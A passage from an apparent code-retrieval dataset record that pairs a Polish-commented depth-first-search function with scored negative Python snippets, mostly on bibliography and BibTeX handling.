is_prime(n):\n \"*** YOUR CODE HERE ***\"\n def helper_prime(n, div):\n if div >= n:\n return 0\n if n % div == 0:\n return 1 + helper_prime(n, div + 1)\n else:\n return helper_prime(n, div + 1)\n\n if helper_prime(n, 2) > 0:\n return False\n return True", "def is_circular_prime(n):\r\n\r\n # pdb.set_trace()\r\n s = str(n)\r\n for i in xrange(len(s)):\r\n if not is_prime(n):\r\n return False\r\n s = s[1:] + s[0]\r\n n = int(s)\r\n\r\n return True", "def radicale(n):\n r = 1\n for p in primi(n+1):\n if p>n:\n break\n if n%p==0:\n r *= p\n n = n//p\n return r" ]
[ "0.7359284", "0.7342926", "0.7322676", "0.7248131", "0.7242679", "0.7216649", "0.7209011", "0.719946", "0.71798897", "0.7179453", "0.71572655", "0.714357", "0.7136565", "0.7130218", "0.7114926", "0.71052164", "0.70893246", "0.7086887", "0.7079261", "0.7075418", "0.7074846", "0.70698917", "0.70610183", "0.7060515", "0.7044326", "0.70310485", "0.70280886", "0.7026237", "0.7023004", "0.70214355", "0.701942", "0.7014844", "0.70148206", "0.701019", "0.7006905", "0.6980025", "0.6977384", "0.6971704", "0.6967824", "0.6964793", "0.69645214", "0.69578844", "0.69414467", "0.6941349", "0.6936703", "0.69303983", "0.69249266", "0.69249266", "0.69223964", "0.691929", "0.6912908", "0.6911879", "0.6910018", "0.69021946", "0.6900566", "0.6899434", "0.6889722", "0.6884336", "0.68732315", "0.68665504", "0.6859152", "0.6854181", "0.68466246", "0.684068", "0.6834484", "0.68322724", "0.6826525", "0.68158984", "0.6814268", "0.68126047", "0.68111324", "0.6805938", "0.6799933", "0.6799645", "0.6796112", "0.6796112", "0.67865974", "0.67816794", "0.67768395", "0.67629755", "0.67557645", "0.6745635", "0.6742998", "0.67421955", "0.6739599", "0.6735307", "0.6731422", "0.6729772", "0.6728248", "0.67060256", "0.67060256", "0.67046183", "0.6701624", "0.6695666", "0.66949934", "0.6692411", "0.66900545", "0.6661951", "0.66581875", "0.6644557" ]
0.7320272
3
Funkcja przyjmuje biblioteke z lista sasiadow dla kazdego wierzcholka. Przeszukuje graf w glab, zwraca kolejnosc odwiedzanych wierzcholkow
def DFS(graph): stack = [] actual_position = '1' stack.append(actual_position) visited_vertices = [] while True: for neighbors in graph.values(): try: neighbors.remove(actual_position) #usun sasiadow o wartosci aktualnej pozycji dla wszystich wierzcholkow grafu except ValueError: pass visited_vertices.append(actual_position) #odwiedzone wierzcholki try: actual_position = min(graph[actual_position]) #przejdz do sasiada o najnizszym numerze except ValueError: stack.remove(actual_position) # sciagamy ze stosu na stos if stack == []: return visited_vertices actual_position = stack.pop(-1) # ustaw z wierzchu stosu pozycje aktualna stack.append(actual_position) # dajemy na stos aktualna pozycje
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_publications(bib_format=\"dict\"):\n\n def get_bibtex(key, value):\n total_keys = [\n \"title\",\n \"journal\",\n \"volume\",\n \"issue\",\n \"number\",\n \"pages\",\n \"numpages\",\n \"year\",\n \"month\",\n \"publisher\",\n \"url\",\n \"doi\",\n \"issn\",\n ]\n bibtex_str = (\n \"@article{\"\n + key\n + \",\\n\"\n + \" author={\"\n + \" and \".join(value[\"author\"])\n + \"},\\n\"\n )\n for key in total_keys:\n if key in value.keys():\n bibtex_str += \" \" + key + \"={\" + value[key] + \"},\\n\"\n bibtex_str += \"}\\n\"\n return bibtex_str\n\n def get_apa(value):\n apa_str = \" & \".join(value[\"author\"])\n if \"year\" in value.keys():\n apa_str += \" (\" + value[\"year\"] + \"). \"\n if \"title\" in value.keys():\n apa_str += value[\"title\"] + \". \"\n if \"journal\" in value.keys():\n apa_str += value[\"journal\"] + \", \"\n if \"volume\" in value.keys():\n apa_str += value[\"volume\"] + \", \"\n if \"pages\" in value.keys():\n apa_str += value[\"pages\"] + \". \"\n if \"doi\" in value.keys():\n apa_str += \"doi: \" + value[\"doi\"] + \"\\n\"\n return apa_str\n\n publication_dict = s.publication_lst\n if bib_format.lower() == \"dict\":\n return publication_dict\n elif bib_format.lower() == \"bibtex\":\n total_str = \"\"\n for pub in publication_dict:\n for key, value in pub.items():\n total_str += get_bibtex(key, value)\n return total_str\n elif bib_format.lower() == \"apa\":\n total_str = \"\"\n for pub in publication_dict:\n for key, value in pub.items():\n total_str += get_apa(value)\n return total_str\n else:\n raise ValueError(\"Supported Bibformats are ['dict', 'bibtex', 'apa']\")", "def load_bib(bib_name):\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n print(\"Path: {}\".format(bib_path))\n print('Creating library..')\n add_dir('library')\n with open(bib_path, 'r') as f:\n # txt = f.read()\n line = f.readline()\n i = 0\n start = False\n while line:\n i += 1\n if (line.find('@')==1) or start: # reading entry\n if start == False:\n filename = get_name(line)\n start = True\n if line.find('title')==1:\n link = get_link(line)\n if link is not None:\n savepath = osp.join(curdir, 'library', filename+'.pdf')\n save_pdf(link, savepath)\n if (line.find('}')==1): # end of entry\n start=False\n line = f.readline()\n print(i) # print line number", "def make_bibtex(self):\n\n\t\t# bib = requests.request('GET', 'http://dx.doi.org/' + self.doi, ", "def get_all_bibliographies(session: CondorSession) -> List[sc.Bibliography]:\n return [sc.Bibliography(bib) for bib in Bibliography.list(session)]", "def mi_biblioteca(request):\n template = \"libros/mi_biblioteca.html\"\n perfil_usuario = obtener_perfil(request.user)\n grupos_usuario = UsuariosGrupo.objects.filter(perfil=perfil_usuario, activo=True).select_related(\"grupo\")\n libros_disponibles = LibrosDisponibles.objects.filter(perfil=perfil_usuario, disponible=True, prestado=False)\n libros_no_disponibles = LibrosDisponibles.objects.filter(perfil=perfil_usuario, disponible=False, prestado=False)\n libros_prestados = LibrosPrestados.objects.filter(perfil_dueno=perfil_usuario, fecha_devolucion=None)\n\n grupos_list = [(g.grupo.id, g.grupo.nombre) for g in grupos_usuario]\n grupos_json = json.dumps(grupos_list)\n\n context = {\n 'grupos_json': grupos_json,\n 'libros_disponibles': libros_disponibles,\n 'libros_prestados': libros_prestados,\n 'libros_no_disponibles': libros_no_disponibles\n }\n\n return render(request, template, context)", "def get_doc_prov(j, gcis_url, refList):\n gcis_ns = \"https://gcis-search-stage.jpl.net:3000/gcis.owl#\"\n doc = ProvEsDocument()\n bndl = None\n \n#to get people attributed to, you need to grab article -> jornal_identifier -> look up in references\n# for ref in refList:\n# if ref['child_publication'] == j['uri']:\n \n\n\n doc_attrs = [\n (\"prov:type\", 'gcis:Article'),\n (\"prov:label\", j['title']),\n (\"prov:location\", j['uri']),\n #(\"prov:wasAttributedTo\", j['']),\n ]\n doc.entity('bibo:%s' % j['identifier'], doc_attrs)\n\n prov_json = json.loads(doc.serialize())\n\n return prov_json", "def set_bibs(self, number):", "def process_bibliography(style, reference_list):\n processed_bibliography = Element(\"ol\", attrib={\"class\":\"bibliography\"})\n\n for reference in reference_list:\n ref = SubElement(processed_bibliography, \"li\", \n attrib={\"property\":\"dc:references\"})\n\n for style_node in style.bibliography.layout:\n process_node(ref, style_node, style.macros, reference) \n\n return(processed_bibliography)", "def load_bib_lines(filenames):\n \n bibliography = {}\n bibsection = 0\n biberrors = 0\n filenames = expandFilenames(filenames)\n for line in fileinput.input(filenames, mode='rU'):\n #iterate until we get to a bibitem section\n line = line.strip()\n if line.startswith(r\"\\begin{thebibliography}\"):\n #mark lines\n bibitems = []\n bibsection = 1\n continue\n elif line.startswith(r\"\\end{thebibliography}\"):\n bibliography[fileinput.filename()] = bibitems\n bibitems = []\n bibsection = 0\n fileinput.nextfile()\n\n if bibsection == 1:\n if not line.isspace():\n try:\n line = line.decode(\"ascii\")\n candline = removeComment(line)\n if candline:\n bibitems.append(candline)\n except UnicodeDecodeError:\n print \"Special Character on line {0} in file {1}\".format(fileinput.filelineno(), fileinput.filename())\n print line\n print \"-\".center(80, '-')\n biberrors += 1\n \n if biberrors > 0:\n print \"{0} errors detected. Received non-ASCII input\".format(biberrors)\n #return an empty list so we don't process bad output\n return []\n \n return split_bibitems(bibliography)", "def getBooks(self):\n srcIds = set([srcId for srcId,altId in self.libMap.values()])\n altIds = set([altId for srcId,altId in self.libMap.values()])\n factory = {'BOOK':Book}\n for modName in mwIniFile.loadOrder:\n print modName\n fileRep = FileRep(modInfos[modName],False)\n fileRep.load(keepTypes=None,factory=factory)\n for record in fileRep.records:\n if record.name == 'BOOK':\n bookId = record.getId()\n if bookId in srcIds:\n print '',bookId\n self.srcBooks[bookId] = (record,modName)\n elif bookId in altIds:\n print '',bookId\n self.altBooks[bookId] = (record,modName)", "def fill(self):\n if self.source == 'citations':\n url = self._scholarly.URLS(\"CITATIONPUB\").format(self.id_citations)\n soup = self._scholarly._get_soup(\n self._scholarly.URLS('HOST').format(url))\n self.bib['title'] = soup.find('div', id='gsc_vcd_title').text\n\n if soup.find('a', class_='gsc_vcd_title_link'):\n self.bib['url'] = soup.find(\n 'a', class_='gsc_vcd_title_link')['href']\n\n for item in soup.find_all('div', class_='gs_scl'):\n key = item.find(class_='gsc_vcd_field').text\n val = item.find(class_='gsc_vcd_value')\n if key == 'Authors':\n self.bib['author'] = ' and '.join(self.get_authorlist(val))\n elif key == 'Journal':\n self.bib['journal'] = val.text\n elif key == 'Volume':\n self.bib['volume'] = val.text\n elif key == 'Issue':\n self.bib['number'] = val.text\n elif key == 'Pages':\n self.bib['pages'] = val.text\n elif key == 'Publisher':\n self.bib['publisher'] = val.text\n elif key == 'Publication date':\n self.bib['year'] = arrow.get(val.text).year\n elif key == 'Description':\n if val.text[0:8].lower() == 'abstract':\n val = val.text[9:].strip()\n self.bib['abstract'] = val\n elif key == 'Total citations':\n self.id_scholarcitedby = re.findall(\n self._scholarly.URLS('SCHOLARPUBRE'), val.a['href'])[0]\n\n # number of citation per year\n years = [int(y.text) for y in soup.find_all(class_='gsc_vcd_g_t')]\n cites = [int(c.text) for c in soup.find_all(class_='gsc_vcd_g_al')]\n self.cites_per_year = dict(zip(years, cites))\n\n if soup.find('div', class_='gsc_vcd_title_ggi'):\n self.bib['eprint'] = soup.find(\n 'div', class_='gsc_vcd_title_ggi').a['href']\n self._filled = True\n\n elif self.source == 'scholar':\n self.bib['add_to_lib'] = self.url_add_sclib\n\n try:\n bibtex = self._scholarly._get_soup(self.url_scholarbib)\n bibtex = bibtex.find('pre').string\n self.bib.update(bibtexparser.loads(bibtex).entries[0])\n self.bib['author_count'] = str(\n len(self.bib['author'].split('and')))\n self.bib['age'] = str(\n int(date.today().year) - int(self.bib['year']))\n except:\n # did not find year\n pass\n\n self._filled = True\n return self", "def bibtex(self) -> str:\n a = BibDatabase()\n a.entries = [self.bib]\n return bibtexparser.dumps(a)", "def getBibTeX(bibref,tag_suf,outFile):\n if bibref == '1988iras....1.....B':\n bibtex = ['>@article{1988iras....1.....B,\\n',\n ' title={Infrared astronomical satellite (IRAS) catalogs and atlases. Volume 1: Explanatory supplement},\\n',\n ' keywords = {All Sky Photography, Catalogs, Indexes (Documentation), Infrared Astronomy Satellite, Cosmology, Galaxies, Star Formation, Stellar Evolution, Astrophysics},\\n',\n ' author={Beichman, CA and Neugebauer, G and Habing, HJ and Clegg, PE and Chester, Thomas J},\\n',\n ' year=1988,\\n',\n ' volume = {1},\\n', \n ' month = jan,\\n', \n ' adsurl = {https://ui.adsabs.harvard.edu/abs/1988iras....1.....B},\\n'\n '}\\n']\n else:\n baseURL = 'https://ui.adsabs.harvard.edu/abs/'\n suf = '/exportcitation'\n lines = urllib.request.urlopen(baseURL+bibref+suf).readlines()\n lines = [l.decode('utf-8') for l in lines] # remove additional webpage encoding\n \n bibtex = []\n for l in range(0, len(lines)):\n if 'export-textarea ' in str(lines[l]):\n bibtex.append(str(lines[l]))\n t = l+1\n \n while '</textarea>' not in str(lines[t+1]):\n bibtex.append(str(lines[t])) \n t += 1\n \n for item in bibtex:\n if 'author' in item.split('=')[0]:\n auth = item.split('=')[1].split(',')[0]\n for i in string.punctuation:\n auth = auth.replace(i, '')\n auth = auth.replace(' ', '')\n if 'year' in item.split('=')[0]:\n yr = item.split('=')[1].split(',')[0]\n yr = yr.replace(' ', '')\n \n try:\n bibtex[0] = bibtex[0].split('>')[1].split('{')[0]+'{'+auth+yr+tag_suf+',\\n'\n except UnboundLocalError as ule:\n print(bibtex)\n print('')\n print(ule)\n sys.exit()\n \n with open(outFile, 'a') as o:\n for item in bibtex:\n item = item.replace('&#34;', '\"')\n item = item.replace('&#39;', \"'\")\n item = item.replace('&amp;', \"&\")\n o.write(item)\n o.write('\\n')\n \n return auth+yr+tag_suf", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def fetch_paper_books():\r\n ct = datetime.datetime.now()\r\n print('Ultima stampa di paper: %s' % ct)\r\n books = Book.objects.all()\r\n for language in settings.LANGUAGES:\r\n activate(language[0])\r\n lan = get_language()\r\n print('Lingua corrente: %s' % lan)\r\n for book in books:\r\n if book.paper_id:\r\n print('Elaboro {}'.format(book.title_it))\r\n paper_soup = render_dropbox_paper_soup(book.paper_id)\r\n filepath = settings.BASE_DIR / 'templates/ebooks/partials/book_paper_{}_{}.html'.format(book.id, language[0]) \r\n with open(filepath, 'w', encoding='utf-8') as f:\r\n print('Stampo %s' % filepath)\r\n f.write(str(paper_soup))\r\n else:\r\n pass\r\n return 1", "def get_wordlists():\n\n\tCS = {'ACM', 'IEEE', 'Computer Science', 'Artificial Intelligence',\n\t\t'Pattern Recognition', 'Computer Vision', 'Machine Learning',\n\t\t'Signal Processing', 'Electrical Engineering', 'Image Processing',\n\t\t'Data Mining', 'Neural Networks', 'Computer Graphics', 'Graphics',\n\t\t'Language Processing', 'Internet', 'Intelligent Systems',\n\t\t'Robotic','Data','Software', 'Machine Vision', 'Image Analysis',\n\t\t'Scientific Computing', 'SIAM', 'Malware','World Wide Web', \n\t\t'Computational Intelligence', 'Computational Linguistics',\n\t\t'Computational linguistics','Algorithm','Computer','ITiCSE',\n\t\t'ITICSE','Machine learning','Learning','learning',\n\t\t'Artificial intelligence','CIVR','Document Analysis'}\n\n\tbio = {'Biology', 'Microbiology', 'Molecular', 'Medical', 'Biological',\n\t\t'Cancer', 'Genome', 'Bioinformatics', 'Protein', 'Biocomputing',\n\t\t'Biomedical', 'biology', 'Medicine', 'Biosystems', 'Virology',\n\t\t'Brain', 'Psychology', 'Genetics', 'Bioengineering', 'Cell',\n\t\t'Cardiology', 'Metabolic', 'Biotechnology', 'Pathogens',\n\t\t'Pathology', 'Plant', 'PLANT', 'Virus', 'Drug','Medicinal',\n\t\t'Neuro','Psych',\n\t\t'Genomic','Diseases','Endocrinology', 'Epidemiology',\n\t\t'Proteom','Biochem', 'DNA', 'Pharma', 'Biomedic', 'biomedica',\n\t\t'Neurobiological'}\n\n\tmath = {'Mathemati','Markov','Probability','Algebra','Network',\n\t\t'Topology','Optimization', 'Geometr','Statistic','Algorithm',\n\t\t'Graph ','Graphs','Combinatori','Riemann Surfaces','Permutation Groups',\n\t\t'Functional Analysis', 'SIAM','Fixed Point','Wavelet','Statistics',\n\t\t'Linear Regression','Fractal','geometry','Multivariate','Chaos',\n\t\t'mathemati','Kernel'}\n\n\tlinguistics = {}\n\n\tcomputer_vision = {}\n\n\tchemistry = {}\n\n\tphysics = {}\n\n\t# Rename \"Computer Vision\" to \"Image Processing\"?\n\ttopic_names = ['Computer Science','Biology','Mathematics','Chemistry',\n\t\t'Physics','Computer Vision','Natural Language Processing']\n\ttopics = [CS, bio, math]#, linguistics, computer_vision, chemistry, physics]\n\n\treturn {topic_names[i]:topics[i] for i in range(len(topics))}", "def ludnosc(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"EN.POP.DNST\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def split_bibitems(bibliography):\n \n refs = []\n for filename, bib in bibliography.iteritems():\n split_ind = []\n for ind, item in enumerate(bib):\n if item.startswith(r\"\\bibitem\"):\n split_ind.append(ind)\n \n for ref in partition(bib, split_ind):\n if ref:\n refs.append(RefObj.RefObj(filename, refstr='\\n'.join(ref)))\n return refs", "def _load_biblical_terms_list(self, biblical_terms_list, _textin=''):\n if not _textin:\n fin = codecs.open(biblical_terms_list, mode='r', \\\n encoding='utf-16')\n lines = [l.strip() for l in fin.readlines()]\n else:\n lines = _textin\n line = ' '.join([aline.strip() for aline in lines])\n html = etree.HTML(line)\n #root = etree.fromstring(line)\n #body = etree.SubElement(html, \"body\")\n body = html[1]\n table = body[0]\n terms = dict()\n for tr in table[1:]:\n term = str(tr[3].text)\n rendering = str(tr[4].text)\n terms[term] = rendering\n return(terms)", "def get_doc_prov(j, gcis_url, refList, orgList):\n doc = ProvEsDocument()\n \n org = requests.get(j['href']).json()\n \n doc_attrs = [\n (\"prov:type\", 'gcis:organization'),\n (\"prov:label\", j['name']),\n (\"prov:location\", \"%s%s\"%(gcis_url, j['uri'])),\n (\"gcis:organization_type_identifier\", j['organization_type_identifier']),\n (\"gcis:country_code\", j['country_code']),\n ]\n orgID = 'bibo:%s' % j['identifier']\n doc.agent(orgID, doc_attrs)\n\n for child in org['children']:\n cOrgURI = child['organization']\n rel = child['relationship']\n\n cOrg = next(o for o in orgList if o['uri'] == cOrgURI)\n cOrgID = 'bibo:%s'%cOrg['identifier']\n\n #cOrgAttrs = [\n # (\"prov:type\", 'gcis:organization'),\n # (\"prov:label\", cOrg['name']),\n # (\"prov:location\", cOrg['uri']),\n # (\"gcis:organization_type_identifier\", cOrg['organization_type_identifier']),\n # (\"gcis:country_code\", cOrg['country_code']),\n # ]\n #doc.entity(cOrgID, cOrgAttrs)\n #doc.hadMember(orgID, cOrgID)\n #for parent in org['parents']:\n # pOrgURI = parent['organization']\n # rel = parent['relationship']\n # pOrg = next(o for o in orgList if o['uri'] == pOrgURI)\n # pOrgID = 'bibo:%s'%pOrg['identifier']\n # doc.hadMember(pOrgID, orgID)\n\n prov_json = json.loads(doc.serialize())\n\n return prov_json", "def mezclar_bolsa(self):", "def snippetList(requeset, format = None):", "def load_biblio(self, file_name, preload_ids=False, chunksize=1000):\n\n logger.info( \"Loading biblio data from [{}], with chunk size {}. Preload IDs? {}\".format(file_name, chunksize, preload_ids) )\n\n input_file = codecs.open(file_name, 'r', 'utf-8')\n biblio = json.load(input_file)\n\n sql_alc_conn = self.db.connect()\n db_api_conn = sql_alc_conn.connection\n\n if (\"cx_oracle\" in str(self.db.dialect)):\n title_ins = DBBatcher(db_api_conn, 'insert into schembl_document_title (schembl_doc_id, lang, text) values (:1, :2, :3)')\n classes_ins = DBBatcher(db_api_conn, 'insert into schembl_document_class (schembl_doc_id, class, system) values (:1, :2, :3)')\n else:\n title_ins = DBBatcher(db_api_conn, 'insert into schembl_document_title (schembl_doc_id, lang, text) values (%s, %s, %s)')\n classes_ins = DBBatcher(db_api_conn, 'insert into schembl_document_class (schembl_doc_id, class, system) values (%s, %s, %s)')\n\n\n ########################################################################\n # STEP 1: If overwriting, find extant docs and pre-populate doc ID map #\n ########################################################################\n\n extant_docs = set()\n\n if self.overwrite or preload_ids:\n\n for chunk in chunks(biblio, chunksize):\n\n # Loop over all biblio entries in this chunk\n doc_nums = set()\n for bib in chunk[1]:\n\n input_pubnum = self._extract_pubnumber(bib)\n\n # Early return: don't bother querying if we already have an ID\n if input_pubnum in self.doc_id_map:\n extant_docs.add( input_pubnum ) \n continue\n\n doc_nums.add(input_pubnum)\n\n if len(doc_nums) == 0:\n continue\n\n self._fill_doc_id_map(doc_nums, sql_alc_conn, extant_docs)\n\n logger.info( \"Discovered {} existing IDs for {} input documents\".format( len(extant_docs),len(biblio)) )\n\n\n ########################################################\n # STEP 2: Main biblio record processing loop (chunked) #\n ########################################################\n\n for chunk in chunks(biblio, chunksize):\n\n logger.debug( \"Processing {} biblio records, up to index {}\".format(len(chunk[1]), chunk[0]) )\n\n new_doc_mappings = dict() # Collection IDs for totally new document \n overwrite_docs = [] # Document records for overwriting\n duplicate_docs = set() # Set of duplicates to read IDs for\n known_count = 0 # Count of known documents\n\n new_titles = []\n new_classes = [] \n\n doc_insert_time = 0\n\n\n transaction = sql_alc_conn.begin()\n\n for bib in chunk[1]:\n\n ########################################\n # STEP 2.1 Extract core biblio records #\n ########################################\n\n family_id, pubdate, pubnumber, assign_applic = self._extract_core_biblio(bib)\n\n life_sci_relevant = self._extract_life_sci_relevance(bib)\n\n\n ####################################################\n # Step 2.2 Overwrite or Insert the document record #\n ####################################################\n\n if pubnumber in extant_docs:\n\n known_count += 1\n\n if self.overwrite:\n # Create an overwrite record\n doc_id = self.doc_id_map[pubnumber] \n overwrite_docs.append({\n 'extant_id' : doc_id,\n 'new_published' : pubdate,\n 'new_family_id' : family_id,\n 'new_life_sci_relevant' : life_sci_relevant,\n 'new_assign_applic' : assign_applic })\n else:\n # The document is known, and we're not overwriting: skip\n continue\n\n else:\n \n # Create a new record for the document\n record = {\n 'scpn' : pubnumber,\n 'published' : pubdate,\n 'family_id' : family_id,\n 'assign_applic' : assign_applic,\n 'life_sci_relevant' : int(life_sci_relevant) }\n \n try:\n\n start = time.time()\n result = sql_alc_conn.execute( self.docs.insert(), record )\n end = time.time()\n\n doc_insert_time += (end-start)\n\n except Exception, exc:\n\n if exc.__class__.__name__ != \"IntegrityError\":\n raise\n\n elif self.allow_document_dups:\n\n # It's an integrity error, and duplicates are allowed.\n known_count += 1\n duplicate_docs.add(pubnumber)\n\n # Reset transaction\n transaction.commit()\n transaction = sql_alc_conn.begin()\n continue \n\n else:\n\n raise RuntimeError(\n \"An Integrity error was detected when inserting document {}. This \"\\\n \"indicates insertion of an existing document, but duplicates have been disallowed\".format(pubnumber))\n\n\n doc_id = result.inserted_primary_key[0] # Single PK\n new_doc_mappings[pubnumber] = doc_id\n\n self._extract_detailed_biblio(bib, doc_id, new_classes, new_titles, pubnumber)\n\n # Commit the new document records, then update the in-memory mapping with the new IDs\n transaction.commit()\n self.doc_id_map.update(new_doc_mappings)\n\n logger.info(\"Processed {} document records: {} new, {} duplicates. DB insertion time = {:.3f}\".format( len(chunk[1]), len(new_doc_mappings), known_count, doc_insert_time))\n\n\n ########################################################\n # STEP 2.2: Deal with document overwrites / duplicates #\n ########################################################\n\n if len(overwrite_docs) > 0:\n\n transaction = sql_alc_conn.begin()\n\n # Update the master record for the document that's being overwritten\n stmt = self.docs.update().\\\n where(self.docs.c.id == bindparam('extant_id')).\\\n values(published=bindparam('new_published'), \n family_id=bindparam('new_family_id'), \n life_sci_relevant=bindparam('new_life_sci_relevant'),\n assign_applic=bindparam('new_assign_applic'))\n\n sql_alc_conn.execute(stmt, overwrite_docs)\n\n # Clean out ALL other references to the document, for re-insertion\n delete_ids = [record['extant_id'] for record in overwrite_docs]\n\n stmt = self.titles.delete().where( self.titles.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n stmt = self.classes.delete().where( self.classes.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n stmt = self.chem_mapping.delete().where( self.chem_mapping.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n transaction.commit()\n\n logger.info(\"Overwrote {} duplicate documents (master doc record updated, all other references deleted)\".format(len(overwrite_docs)))\n\n if len(duplicate_docs) > 0:\n self._fill_doc_id_map(duplicate_docs, sql_alc_conn)\n\n logger.info(\"Read {} IDs for duplicate documents\".format(len(duplicate_docs)))\n\n ########################################################\n # STEP 2.3: Bulk insertion of titles / classifications #\n ########################################################\n\n\n # Bulk insert titles and classification\n if self.load_titles:\n title_ins.execute(new_titles)\n logger.debug(\"Insertion of {} titles completed\".format(len(new_titles)) )\n\n if self.load_classifications:\n classes_ins.execute(new_classes)\n logger.debug(\"Insertion of {} classification completed\".format(len(new_classes)) )\n\n # END of main biblio processing loop\n\n # Clean up resources\n title_ins.close()\n classes_ins.close()\n sql_alc_conn.close()\n input_file.close()\n\n logger.info(\"Biblio import completed\" )", "def cv_list(self):\n\n mystr = \"\"\n for p in self.mypapers:\n mystr += f\"{p.title[0]}\\n\"\n if len(p.author) > 12:\n a = f\"{p.author[0]} et al. \"\n elif len(p.author) > 2:\n a = \", \".join(p.author[:-1]) + f\" & {p.author[-1]} \"\n elif len(p.author) == 2:\n a = f\"{p.author[0]} & {p.author[1]} \"\n else:\n a = f\"{p.author[0]} \"\n\n mystr += f\"{a}\"\n mystr += f\"{p.year}, {p.pub}\"\n if p.volume is not None:\n mystr += f\", {p.volume}\"\n if p.issue is not None:\n mystr += f\", {p.issue}\"\n if p.page is not None:\n mystr += f\", {p.page[0]}\"\n mystr += \"\\n\\n\"\n return mystr", "def get_bibtex(self):\n\n return self._bibtexs", "def get_compo_list(self):\n super(self.__class__, self).get_compo_list()\n link = 'https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average'\n params={'Symbol':2, 'Name':0, 'Sector':3, 'Industry':3}\n self.components = get_index_components_from_wiki(link, params)\n # insert CIK\n ciks = self.update_ciks(updateall=True)\n self.components = self.components.join(ciks)\n return self.components", "def loeschen(self):\r\n loeschen=self.REQUEST['loeschen']\r\n tit=''\r\n i=0\r\n j=0\r\n index=[]\r\n cursor=[]\r\n for x in self.objectValues('Image'):\r\n if str(x.id())[0:6] not in index:\r\n index.append(str(x.id())[0:6]) \r\n cursor.append([str(x.id())[0:6],str(x.title),[str(x.id())]])\r\n if str(x.id())[0:6]==loeschen:\r\n tit=str(x.title)\r\n j=i\r\n i=i+1\r\n else:\r\n cursor[-1][2].append(str(x.id()))\r\n #for val in cursor[j][2]:\r\n #self._delOb(self, id=str(val))\r\n #delet=delet+str(val)+' '\r\n self.manage_delObjects(ids=cursor[j][2])\r\n return tit+' gel&ouml;scht !'", "def __createBiblioObjFromBiblioElement(biblio_element, publication_object):\r\n #description \r\n #++++++BIBLIOGRAPHIC-RECORD++++++\r\n #check Bibliographical-record Element\r\n if biblio_element is None:\r\n return\r\n #make blank Biblio Object\r\n biblio_object = BibliographicRecord()\r\n #Bibliographic-record sub-elements (used to read XML)\r\n if biblio_element is not None:\r\n urls = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')\r\n bibliometric_data_element = biblio_element.find(SYMPLECTIC_NAMESPACE + 'bibliometric-data')\r\n bibliographic_data_element = biblio_element.find(SYMPLECTIC_NAMESPACE + 'bibliographic-data')\r\n if bibliographic_data_element is not None:\r\n native_element = bibliographic_data_element.find(SYMPLECTIC_NAMESPACE + 'native')\r\n if native_element is not None:\r\n authors_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'authors')\r\n keywords_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'keywords')\r\n #bibliographic-record attribs\r\n if biblio_element is not None:\r\n biblio_object.data_source = biblio_element.get('data-source','')\r\n biblio_object.id_at_source = biblio_element.get('id-at-source','')\r\n biblio_object.verification_status = SymplecticXMLPubs.__getElementText( biblio_element.find(SYMPLECTIC_NAMESPACE + 'verification-status') ) \r\n #bibliometric data\r\n if bibliometric_data_element is not None:\r\n biblio_object.times_cited = SymplecticXMLPubs.__getElementText( bibliometric_data_element.find(SYMPLECTIC_NAMESPACE + 'times-cited') )\r\n biblio_object.reference_count = SymplecticXMLPubs.__getElementText( bibliometric_data_element.find(SYMPLECTIC_NAMESPACE + 'reference-count') )\r\n #native\r\n if native_element is not None:\r\n biblio_object.abstract = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'abstract') )\r\n biblio_object.associated_authors = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'associated-authors') )\r\n biblio_object.awarded_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'awarded-date') )\r\n biblio_object.begin_page = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'begin-page') )\r\n biblio_object.book_author_type = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'book-author-type') )\r\n biblio_object.commissioning_body = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'commissioning-body') )\r\n biblio_object.confidential = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'confidential') )\r\n biblio_object.doi = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'doi') )\r\n biblio_object.edition = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'edition') )\r\n biblio_object.editors = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'editors') )\r\n biblio_object.end_page = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'end-page') )\r\n biblio_object.filed_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'filed-date') )\r\n biblio_object.fnish_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'fnish-date') )\r\n biblio_object.isbn_10 = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'isbn-10') )\r\n biblio_object.isbn_13 = SymplecticXMLPubs.__getElementText( 